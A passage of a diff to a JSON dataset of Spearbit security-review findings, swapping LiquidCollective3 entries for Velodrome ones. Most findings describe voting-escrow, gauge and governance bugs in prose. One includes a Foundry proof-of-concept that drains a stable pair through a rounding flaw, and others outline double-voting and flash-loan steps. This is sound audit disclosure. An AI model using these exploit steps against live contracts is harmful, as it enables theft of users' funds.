require(escrowType[_tokenId] == EscrowType.NORMAL, \"VotingEscrow: can only deposit normal nft\"); require(!voted[_tokenId], \"VotingEscrow: nft voted\"); require(ownershipChange[_tokenId] != block.number, \"VotingEscrow: flash nft protection\"); require(_balanceOfNFT(_tokenId, block.timestamp) > 0, \"VotingEscrow: no balance to deposit\"); ..SNIP.. The owner of a normal NFT will have their voting balance transferred to a malicious managed NFT, resulting in loss of rewards and voting power for the victim. Additionally, a malicious owner of a managed NFT could aggregate 14 voting power of the victim's normal NFTs, and perform malicious actions such as stealing the rewards from the victims or use its inflated voting power to pass malicious proposals.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Gas Optimization" + "Velodrome", + "Severity: High Risk" ] }, { - "title": "Report's bufferRebalancingMode and slashingContainmentMode are only used during the reporting transaction process", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "report.bufferRebalancingMode and report.slashingContainmentMode are only used during the transaction and their previous values are not used in the protocol. They can be removed from being added to the stored report. Note that their historical values can be queried by listening to the ProcessedConsensusLayerReport(report, vars.trace) events.", + "title": "First liquidity provider of a stable pair can DOS the pool", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The invariant k of a stable pool is calculated as follows Pair.sol#L505 function _k(uint256 x, uint256 y) internal view returns (uint256) { if (stable) { uint256 _x = (x * 1e18) / decimals0; uint256 _y = (y * 1e18) / decimals1; uint256 _a = (_x * _y) / 1e18; uint256 _b = ((_x * _x) / 1e18 + (_y * _y) / 1e18); return (_a * _b) / 1e18; // x3y+y3x >= k } else { return x * y; // xy >= k } } The value of _a = (x * y ) / 1e18 = 0 due to rounding error when x*y < 1e18. The rounding error can lead to the invariant k of stable pools equals zero, and the trader can steal whatever is left in the pool. The first liquidity provider can DOS the pair by: 1.mint a small amount of liquidity to the pool, 2. Steal whatever is left in the pool, 3. Repeat step 1, and step 2 until the overflow of the total supply. To prevent the issue of rounding error, the reserve of a pool should never go too small. The mint function which was borrowed from uniswapV2 has a minimum liquidity check of sqrt(a * b) > MINIMUM_LIQUIDITY; This, however, isn't safe enough to protect the invariant formula of stable pools. Pair.sol#L344-L363 uint256 internal constant MINIMUM_LIQUIDITY = 10**3; // ... function mint(address to) external nonReentrant returns (uint256 liquidity) { // ... uint256 _amount0 = _balance0 - _reserve0; uint256 _amount1 = _balance1 - _reserve1; uint256 _totalSupply = totalSupply(); if (_totalSupply == 0) { liquidity = Math.sqrt(_amount0 * _amount1) - MINIMUM_LIQUIDITY; //@audit what about the fee? _mint(address(1), MINIMUM_LIQUIDITY); // permanently lock the first MINIMUM_LIQUIDITY tokens - ,! cannot be address(0) // ... } This is the POC of an exploit extended from Pair.t.sol 15 contract PairTest is BaseTest { // ... function drainPair(Pair pair, uint initialFraxAmount, uint initialDaiAmount) internal { DAI.transfer(address(pair), 1); uint amount0; uint amount1; if (address(DAI) < address(FRAX)) { amount0 = 0; amount1 = initialFraxAmount - 1; } else { amount1 = 0; amount0 = initialFraxAmount - 1; } pair.swap(amount0, amount1, address(this), new bytes(0)); FRAX.transfer(address(pair), 1); if (address(DAI) < address(FRAX)) { amount0 = initialDaiAmount; // initialDaiAmount + 1 - 1 amount1 = 0; } else { amount1 = initialDaiAmount; // initialDaiAmount + 1 - 1 amount0 = 0; } pair.swap(amount0, amount1, address(this), new bytes(0)); } function testDestroyPair() public { deployCoins(); deal(address(DAI), address(this), 100 ether); deal(address(FRAX), address(this), 100 ether); deployFactories(); Pair pair = Pair(factory.createPair(address(DAI), address(FRAX), true)); for(uint i = 0; i < 10; i++) { DAI.transfer(address(pair), 10_000_000); FRAX.transfer(address(pair), 10_000_000); // as long as 10_000_000^2 < 1e18 uint liquidity = pair.mint(address(this)); console.log(\"pair:\", address(pair), \"liquidity:\", liquidity); console.log(\"total liq:\", pair.balanceOf(address(this))); drainPair(pair, FRAX.balanceOf(address(pair)) , DAI.balanceOf(address(pair))); console.log(\"DAI balance:\", DAI.balanceOf(address(pair))); console.log(\"FRAX balance:\", FRAX.balanceOf(address(pair))); require(DAI.balanceOf(address(pair)) == 1, \"should drain DAI balance\"); require(FRAX.balanceOf(address(pair)) == 2, \"should drain FRAX balance\"); } DAI.transfer(address(pair), 1 ether); FRAX.transfer(address(pair), 1 ether); vm.expectRevert(); pair.mint(address(this)); } }", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Gas Optimization" + "Velodrome", + "Severity: High Risk" ] }, { - "title": "Add more comments/documentation for ConsensusLayerReport and StoredConsensusLayerReport structs", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "The ConsensusLayerReport and StoredConsensusLayerReport structs are defined as /// @notice The format of the oracle report struct ConsensusLayerReport { uint256 epoch; uint256 validatorsBalance; uint256 validatorsSkimmedBalance; uint256 validatorsExitedBalance; uint256 validatorsExitingBalance; uint32 validatorsCount; uint32[] stoppedValidatorCountPerOperator; bool bufferRebalancingMode; bool slashingContainmentMode; } /// @notice The format of the oracle report in storage struct StoredConsensusLayerReport { uint256 epoch; uint256 validatorsBalance; uint256 validatorsSkimmedBalance; uint256 validatorsExitedBalance; uint256 validatorsExitingBalance; uint32 validatorsCount; bool bufferRebalancingMode; bool slashingContainmentMode; } Comments regarding their specified fields are lacking.", + "title": "Certain functions are unavailable after opting in to the \"auto compounder", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Certain features (e.g., delegation, governance voting) of a veNFT would not be available if the veNFT is transferred to the auto compounder. Let x be a managed veNFT. When an \"auto compounder\" is created, ownership of x is transferred to the AutoCom- pounder contract, and any delegation within x is cleared. The auto compounder can perform gauge weight voting using x via the provided AutoCompounder.vote function. However, it loses the ability to perform any delegation with x because the AutoCompounder contract does not contain a function that calls the VotingEscrow.delegate function. Only the owner of x, the AutoCompounder contract, can call the VotingEscrow.delegate function. x also loses the ability to vote on governance proposals as the existing AutoCompounder contract does not support this feature. Once the owner of the managed NFTs has opted in to the \"auto compounder,\" it is not possible for them to subsequently \"opt out.\" Consequently, if they need to exercise delegation and governance voting, they will be unable to do so, exacerbating the impact. 17", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "postUnderlyingBalanceIncludingExits and preUnderlyingBalanceIncludingExits can be removed from setConsensusLayerData", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "Both postUnderlyingBalanceIncludingExits ( Bpost ) and preUnderlyingBalanceIncludingEx- its ( Bpre ) include the accumulated skimmed and exited amounts overtime which part of them might have exited the protocol through redeeming (or skimmed back to CL and penalized). Their delta is almost the same as the delta of vars.postReportUnderlyingBalance and vars.preReportUnderlyingBalance (almost if one adds a check for non-decreases of validator counts). u u : postUnderlyingBalanceIncludingExits u : preUnderlyingBalanceIncludingExits u (cid:0) Bpre u : vars.postReportUnderlyingBalance : vars.preReportUnderlyingBalance : Breport,post (cid:0) Breport,pre u u Bpost u Bpre (cid:1)Bu: Bpost Breport,post Breport,pre u (cid:1)Breport u Bprev v : u Bcurr v (cid:1)Bv : Bcurr Bprev s Bcurr s (cid:1)Bs: Bcurr Bprev e Bcurr e (cid:1)Be: Bcurr previous reported/stored value for total validator balances in CL LastConsensusLayerRe- port.get().validatorsBalance v (cid:0) Bprev v (can be negative) : current reported value of total validator balances in CL report.validatorsBalance : LastConsensusLayerReport.get().validatorsSkimmedBalance : report.validatorsSkimmedBalance s (cid:0) Bprev s (always non-negative, this is an invariant that gets checked). : LastConsensusLayerReport.get().validatorsExitedBalance : report.validatorsExitedBalance e (cid:0) Bprev e (always non-negative, this is an invariant that gets checked). $C{prev} $: LastConsensusLayerReport.get().validatorsCount Ccurr : report.validatorsCount (cid:1)C: Ccurr (cid:0) Cprev (this value should be non-negative, note this invariant has not been checked in the code- base) Cdeposit : DepositedValidatorCount.get() Bd : BalanceToDeposit.get() 22 Bc: CommittedBalance.get() Br : BalanceToRedeem.get() Note that the above values are assumed to be in their form before the current report gets stored in the storage. Then we would have Bpost u = Bcurr v + Bcurr s + Bcurr e = Bpre u + (cid:1)Bv + (cid:1)Bs + (cid:1)Be (cid:0) 32(cid:1)C and so: (cid:1)Bu = (cid:1)Bv + (cid:1)Bs + (cid:1)Be (cid:0) 32(cid:1)C = (cid:1)Breport u", + "title": "Claimable gauge distributions are locked when killGauge is called", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "When a gauge is killed, the claimable[_gauge] key value is cleared. Because any rewards received by the Voter contract are indexed and distributed in proportion to each pool's weight, this claimable amount is permanently locked within the contract.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "The formula or the parameter names for calculating currentMaxDailyCommittableAmount can be made more clear", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "currentMaxDailyCommittableAmount is calculated using the below formula: // we compute the max daily committable amount by taking the asset balance without the balance to deposit into account ,! uint256 currentMaxDailyCommittableAmount = LibUint256.max( dcl.maxDailyNetCommittableAmount, (uint256(dcl.maxDailyRelativeCommittableAmount) * (underlyingAssetBalance - ,! currentBalanceToDeposit)) / LibBasisPoints.BASIS_POINTS_MAX ); Therefore its value is the maximum of two potential maximum values.", + "title": "Bribe and fee token emissions can be gamed by users", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "A user may vote or reset their vote once per epoch. Votes persist across epochs and once a user has distributed their votes among their chosen pools, the poke() function may be called by any user to update the target user's decayed veNFT token balance. However, the poke() function is not hooked into any of the reward distribution contracts. As a result, a user is incentivized to vote as soon as they create their lock and avoid re-voting in subsequent epochs. The amount deposited via Reward._deposit() does not decay linearly as how it is defined under veToken mechanics. Therefore, users could continue to earn trading fees and bribes even after their lock has expired. Simultaneously, users can poke() other users to lower their voting weight and maximize their own earnings.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "preExitingBalance is a rough estimate for signalling the number of validators to request to exit", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "exitingBalance and preExitingBalance might be trying to compensate for the same portion of balance (non-stopped validators which have been signaled to exit and are in the CL exit queue). That means the number of validatorCountToExit calculated to accommodate for the redeem demand is actually lower than what is required. The important portion of preExitingBalance is for the validators that were singled to exit in the previous reporting round but the operators have not registered them for exit in CL. Also totalStoppedValidatorCount can include slashed validator counts which again lowers the required validatorCountToExit and those values should not be accounted for here. Perhaps the oracle members should also report the slashing counts of validators so that one can calculate these values more accurately.", + "title": "Compromised or malicious owner can drain the VotingEscrow contract of VELO tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The FactoryRegistry contract is an Ownable contract with the ability to control the return value of the managedRewardsFactory() function. As such, whenever createManagedLockFor() is called in VotingEscrow, the FactoryRegistry contract queries the managedRewardsFactory() function and subsequently calls createRe- wards() on this address. If ownership of the FactoryRegistry contract is compromised or malicious, the createRewards() external call can return any arbitrary _lockedManagedReward address which is then given an infinite token approval. As a result, it's possible for all locked VELO tokens to be drained and hence, this poses a significant centralization risk to the protocol.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "More documentation can be added regarding the currentMaxDailyCommittableAmount calculation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "currentMaxDailyCommittableAmount calculated as // we compute the max daily committable amount by taking the asset balance without the balance to deposit into the account ,! uint256 currentMaxDailyCommittableAmount = LibUint256.max( dcl.maxDailyNetCommittableAmount, (uint256(dcl.maxDailyRelativeCommittableAmount) * (underlyingAssetBalance - ,! currentBalanceToDeposit)) / LibBasisPoints.BASIS_POINTS_MAX ); We can add further to the comment: Since before the _commitBalanceToDeposit hook is called we have skimmed the remaining to redeem balance to BalanceToDeposit, underlyingAssetBalance - currentBalanceToDeposit represent the funds allocated for CL (funds that are already in CL, funds that are in transit to CL or funds committed to be deposited to CL). It is important that the redeem balance is already skimmed for this upper bound calculation, so for future code changes we should pay attention to the order of hook callbacks otherwise the upper bounds would be different.", + "title": "Unsafe casting in RewardsDistributor leads to underflow of veForAt", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Solidity does not revert when casting a negative number to uint. Instead, it underflows to a large number. In the RewardDistributor contract, the balance of a token at specific time is calculated as follows IVotingEscrow.Point memory pt = IVotingEscrow(_ve).userPointHistory(_tokenId, epoch); Math.max(uint256(int256(pt.bias - pt.slope * (int128(int256(_timestamp - pt.ts))))), 0); This supposes to return zero when the calculated balance is a negative number. However, it underflows to a large number. This would lead to incorrect reward distribution if third-party protocols depend on this function, or when further updates make use of this codebase.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "BalanceToRedeem is only non-zero during a report processing transaction", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "BalanceToRedeem is only ever posses a non-zero value during the report processing when a quorum has been made for the oracle member votes (setConsensusLayerData). And at the very end of this process its value gets reset back to 0.", + "title": "Proposals can be griefed by front-running and canceling", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Because the Governor uses OZ's Implementation, a griefter can front-run a valid proposal with the same settings and then immediately cancel it. You can avoid the grief by writing a macro contract that generates random descriptions to avoid the front-run. See: code-423n4/2022-09-nouns-builder-findings#182.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "Improve clarity on bufferRebalancingMode variable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "According to the documentation, the bufferRebalancingMode flag passed by the oracle should allow or disallow the rebalancing of funds between the Deposit and Redeem buffers. The flag correctly disables rebalancing in the DepositBuffer to RedeemBuffer direction as can be seen here if (depositToRedeemRebalancingAllowed && availableBalanceToDeposit > 0) { uint256 rebalancingAmount = LibUint256.min( availableBalanceToDeposit, redeemManagerDemandInEth - exitingBalance - availableBalanceToRedeem ); if (rebalancingAmount > 0) { availableBalanceToRedeem += rebalancingAmount; _setBalanceToRedeem(availableBalanceToRedeem); _setBalanceToDeposit(availableBalanceToDeposit - rebalancingAmount); } } but it is not used at all when pulling funds in another way // if funds are left in the balance to redeem, we move them to the deposit balance _skimExcessBalanceToRedeem();", + "title": "pairFor does not correctly sort tokens when overriding for SinkConverter", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The router will always search for pairs by sorting tokenA and TokenB. Notably, for the velo and Velo2 pair, the Router will not perform the sorting 21 //Router.sol#L69-L73 if (factory == defaultFactory) { if ((tokenA == IPairFactory(defaultFactory).velo()) && (tokenB == ,! IPairFactory(defaultFactory).veloV2())) { return IPairFactory(defaultFactory).sinkConverter(); } } Meaning that the pair for Velo -> Velo2 will be the Sink but the pair for Velo2 -> Velo will be some other pair. Additionally, you can front-run a call to setSinkConverter() by calling createPair() with the same parameters. How- ever, the respective values for getPair() would be overwritten with the sinkConverter address. This could lead to some weird and unexpected behaviour as we would still have an invalid Pair contract for the v1 and v2 velo tokens.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "Fix code style consistency issues", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "There is a small code styling mismatch between the new code under audit and the style used through the rest of the code. Specifically, function parameter names are supposed to be prepended with _ to differentiate them from variables defined in the function body.", + "title": "Inconsistent between balanceOfNFT, balanceOfNFTAt and _balanceOfNFT functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The balanceOfNFT function implements a flash-loan protection that returns zero voting balance if ownershipChange[_tokenId] == block.number. However, this was not consistently applied to the balanceOfNF- TAt and _balanceOfNFT functions. VotingEscrow.sol function balanceOfNFT(uint256 _tokenId) external view returns (uint256) { if (ownershipChange[_tokenId] == block.number) return 0; return _balanceOfNFT(_tokenId, block.timestamp); } As a result, Velodrome or external protocols calling the balanceOfNFT and balanceOfNFTAt external functions will receive different voting balances for the same veNFT depending on which function they called. Additionally, the internal _balanceOfNFT function, which does not have flash-loan protection, is called by the VotingEscrow.getVotes function to compute the voting balance of an account. The VotingEscrow.getVotes function appears not to be used in any in-scope contracts, however, this function might be utilized by some exter- nal protocols or off-chain components to tally the votes. If that is the case, a malicious user could flash-loan the veNFTs to inflate the voting balance of their account.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "Remove unused constants", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "DENOMINATION_OFFSET is unused and can be removed from the codebase.", + "title": "Nudge check will break once limit is reached", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Because you're checking both sides, once oldRate reaches the MAX_RATE, every new nudge call will revert. Meaning that if _newRate ever get's to MAXIMUM_TAIL_RATE or MINIMUM_TAIL_RATE, nudge will stop working.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "Document what TotalRequestedExits can potentially represent", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "Documentation is lacking for TotalRequestedExits. This parameter represents a quantity that is a mix of exited (or to be exited) and slashed validators for an operator. Also, in general, this is a rough quantity since we don't have a finer reporting of slashed and exited validators (they are reported as a sum).", + "title": "ownershipChange can be sidestepped", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The check there is to prevent adding to managed after a transfer from or creation require(ownershipChange[_tokenId] != block.number, \"VotingEscrow: flash nft protection\"); However, it doesn't prevent adding and removing from other managed tokens, merging, or splitting. For this reason, we can sidestep the lock by splitting Because ownershipChange is updated exclusively on _transferFrom, we can side-step it being set by splitting the lock into a new one which will not have the lock.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "Operators need to listen to RequestedValidatorExits and exit their validators accordingly", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "Operators need to listen to RequestedValidatorExits and exit their validators accordingly emit RequestedValidatorExits(operators[idx].index, requestedExits + operators[idx].picked); Note that requestedExits + operators[idx].picked represents the upper bound for the index of the funded validators that need to be exited by the operator.", + "title": "The fromBlock variable of a checkpoint is not initialized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "A checkpoint contains a fromBlock variable which stores the block number the checkpoint is created. /// @notice A checkpoint for marking delegated tokenIds from a given block struct Checkpoint { uint256 fromBlock; uint256[] tokenIds; } However, it was found that the fromBlock variable of a checkpoint was not initialized anywhere in the codebase. Therefore, any function that relies on the fromBlock of a checkpoint will break. The VotingEscrow._findWhatCheckpointToWrite and VotingEscrow.getPastVotesIndex functions were found to rely on the fromBlock variable of a checkpoint for computation. The following is a list of functions that calls these two affected functions. _findWhatCheckpointToWrite -> _moveTokenDelegates -> _transferFrom _findWhatCheckpointToWrite -> _moveTokenDelegates -> _mint _findWhatCheckpointToWrite -> _moveTokenDelegates -> _burn _findWhatCheckpointToWrite -> _moveAllDelegates -> _delegate -> delegate/delegateBySig getPastVotesIndex -> getTokenIdsAt getPastVotesIndex -> getPastVotes -> GovernorSimpleVotes._getVotes Instance 1 - VotingEscrow._findWhatCheckpointToWrite function The VotingEscrow._findWhatCheckpointToWrite function verifies if the fromBlock of the latest checkpoint of an account is equal to the current block number. If true, the function will return the index number of the last checkpoint. function _findWhatCheckpointToWrite(address account) internal view returns (uint32) { uint256 _blockNumber = block.number; uint32 _nCheckPoints = numCheckpoints[account]; if (_nCheckPoints > 0 && _checkpoints[account][_nCheckPoints - 1].fromBlock == _blockNumber) { return _nCheckPoints - 1; } else { return _nCheckPoints; } } As such, this function does not work as intended and will always return the index of a new checkpoint. Instance 2 - VotingEscrow.getPastVotesIndex function The VotingEscrow.getPastVotesIndex function relies on the fromBlock of the latest checkpoint for optimization purposes. If the request block number is the most recently updated checkpoint, it will return the latest index immediately and skip the binary search. Since the fromBlock variable is not populated, the optimization will not work. 24 function getPastVotesIndex(address account, uint256 blockNumber) public view returns (uint32) { uint32 nCheckpoints = numCheckpoints[account]; if (nCheckpoints == 0) { return 0; } // First check most recent balance if (_checkpoints[account][nCheckpoints - 1].fromBlock <= blockNumber) { return (nCheckpoints - 1); } // Next check implicit zero balance if (_checkpoints[account][0].fromBlock > blockNumber) { return 0; } uint32 lower = 0; uint32 upper = nCheckpoints - 1; while (upper > lower) { uint32 center = upper - (upper - lower) / 2; // ceil, avoiding overflow Checkpoint storage cp = _checkpoints[account][center]; if (cp.fromBlock == blockNumber) { return center; } else if (cp.fromBlock < blockNumber) { lower = center; } else { upper = center - 1; } } return lower; }", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "Oracle members would need to listen to ClearedReporting and report their data if necessary", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "Oracle members would need to listen to ClearedReporting event and report their data if necessary", + "title": "Double voting by shifting the voting power between managed and normal NFTs", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Owners of normal NFTs and managed NFTs could potentially collude to double vote, which affects the fairness of the gauge weight voting. A group of malicious veNFT owners could exploit this and use the inflated voting balance to redirect the VELO emission to gauges where they have a vested interest, causing losses to other users. The following shows that it is possible to increase the weight of a pool by 2000 with a 1000 voting balance within a single epoch by shifting the voting power between managed and normal NFTs. For simplicity's sake, assume the following Alice is the owner of a managed NFT (tokenID=888) Bob is the owner of a normal NFT (tokenID=999) Alice's managed NFT (tokenID=888) only consists of one (1) normal NFT (tokenID=999) that belongs to Bob being locked up. The following steps are executed within the same epoch. At the start, the state is as follows: Voting power of Alice's managed NFT (tokenID=888) is 1000 25 The 1000 voting came from the normal NFT (tokenID=999) during the deposit weights[_tokenId][_mTokenId] = _weight | weights[999][888] = 1000; Voting power of Bob's normal NFT (tokenID=999) is zero (0) Weight of Pool X = 0 Alice calls Voter.vote function with his managed NFT (tokenID=888), and increases the weight of Pool X by 1000. Subsequently, the lastVoted[_tokenId] = _timestamp at Line 222 in the Voter.vote function will be set, and the onlyNewEpoch modifier will ensure Alice cannot use the same managed NFT (tokenID=888) to vote again in the current epoch. However, Bob could call the VotingEscrow.withdrawManaged to withdraw his normal NFT (tokenID=999) from the managed NFT (tokenID=888). Within the function, it will call the internal _checkpoint function to \"transfer\" the voting power from managed NFT (tokenID=888) to normal NFT (tokenID=999). At this point, the state is as follows: Voting power of Alice's managed NFT (tokenID=888) is zero (0) Voting power of Bob's normal NFT (tokenID=999) is 1000 Weight of Pool X = 1000 Bob calls Voter.vote function with his normal NFT (tokenID=999) and increases the weight of Pool X by 1000. Since normal NFT (tokenID=999) has not voted in the current epoch, it is allowed to vote. The weight of Pool X becomes 2000. It was observed that a mechanism is in place to punish and disincentivize malicious behaviors from a managed NFT owner. The protocol's emergency council could deactivate Managed NFTs involved in malicious activities via the VotingEscrow.setManagedState function. In addition, the ability to create a managed NFT is restricted to only an authorized manager and protocol's governor. These factors help to mitigate some risks related to this issue to a certain extent.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "The only way for an oracle member to change its report data for an epoch is to reset the reporting process by changing its address", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "If an oracle member has made a mistake in its CL report to the Oracle or for some other reason would like to change its report, it would not be able to due to the following if block: // we retrieve the voting status of the caller, and revert if already voted if (ReportsPositions.get(uint256(memberIndex))) { revert AlreadyReported(report.epoch, msg.sender); } The only way for the said oracle member to be able to report different data is to reset its address by calling setMember. This would cause all the report variants and report positions to be cleared and force all the other oracle members to report their data again. Related: Any oracle member can censor almost quorum report variants by resetting its address.", + "title": "MetaTX is using the incorrect Context", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Throughout the codebase, the code uses Context for _msgSender() The implementation chosen will resolve each _msgSender() to msg.sender which is inconsistent with the goal of allowing MetaTX.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "For a quorum making CL report the epoch restrictions are checked twice.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "When an oracle member reports to the Oracle's reportConsensusLayerData, the requirements for a valid epoch is checked once in reportConsensusLayerData: // checks that the report epoch is not invalid if (!river.isValidEpoch(report.epoch)) { revert InvalidEpoch(report.epoch); } and once again in setConsensusLayerData // we start by verifying that the reported epoch is valid based on the consensus layer spec if (!_isValidEpoch(cls, report.epoch)) { revert InvalidEpoch(report.epoch); } Note that only the Oracle can call the setConsensusLayerData endpoint and the only time the Oracle makes this call is when the quorum is reached in reportConsensusLayerData.", + "title": "depositFor function should be restricted to approved NFT types", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The depositFor function was found to accept NFT of all types (normal, locked, managed) without restriction. function depositFor(uint256 _tokenId, uint256 _value) external nonReentrant { LockedBalance memory oldLocked = _locked[_tokenId]; require(_value > 0, \"VotingEscrow: zero amount\"); require(oldLocked.amount > 0, \"VotingEscrow: no existing lock found\"); require(oldLocked.end > block.timestamp, \"VotingEscrow: cannot add to expired lock, withdraw\"); _depositFor(_tokenId, _value, 0, oldLocked, DepositType.DEPOSIT_FOR_TYPE); } Instance 1 - Anyone can call depositFor against a locked NFT Users should not be allowed to increase the voting power of a locked NFT by calling the depositFor function as locked NFTs are not supposed to vote. Thus, any increase in the voting balance of locked NFTs will not increase the gauge weight, and as a consequence, the influence and yield of the deposited VELO will be diminished. In addition, the locked balance will be overwritten when the veNFT is later withdrawn from the managed veNFT, resulting in a loss of funds. Instance 2 - Anyone can call depositFor against a managed NFT Only the RewardsDistributor.claim function should be allowed to call depositFor function against a managed NFT to process rebase rewards claimed and to compound the rewards into the LockedManagedReward contract. However, anyone could also increase the voting power of a managed NFT directly by calling depositFor with a tokenId of a managed NFT, which breaks the invariant.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "Clear report variants and report position data during the migration to the new contracts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "Upon migration to the new contract with a new type of reporting data the old report positions and variants should be cleared by calling _clearReports() on the new contract or an older counterpart on the old contract. Note that the report variants slot will be changed from: bytes32(uint256(keccak256(\"river.state.reportsVariants\")) - 1) to: bytes32(uint256(keccak256(\"river.state.reportVariants\")) - 1)", + "title": "Lack of vetoer can lead to 51% attack", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The veto power is important functionality in a governance system in order to protect from malicious proposals. However there is lack of vetoer in VeloGovernor , this might lead to Velodrome losing their veto power unintentionally and open to 51% attack. With 51% attack a malicous actor can change the governor in Voter contract or by pass the tokens whitelist adding new gauge with malicious token. References dialectic.ch/editorial/nouns-governance-attack-2 code4rena.com/reports/2022-09-nouns-builder/#m-11-loss-of-veto-power-can-lead-to-51-attack", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "Remove unused functions from Oracle", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "The following functions are unused and can be removed from the Oracle's implementation isValidEpoch getTime getExpectedEpochId getLastCompletedEpochId getCurrentEpochId getCLSpec getCurrentFrame getFrameFirstEpochId getReportBounds", + "title": "Compromised or malicious owner can siphon rewards from the Voter contract", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The createGauge() function takes a _gaugeFactory parameter which is checked to be approved by the FactoryRegistry contract. However, the owner of this contract can approve any arbitrary FactoryRegistry contract, hence the return value of the IGaugeFactory(_gaugeFactory).createGauge() call may return an EOA which steals rewards every time notifyRewardAmount() is called.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": 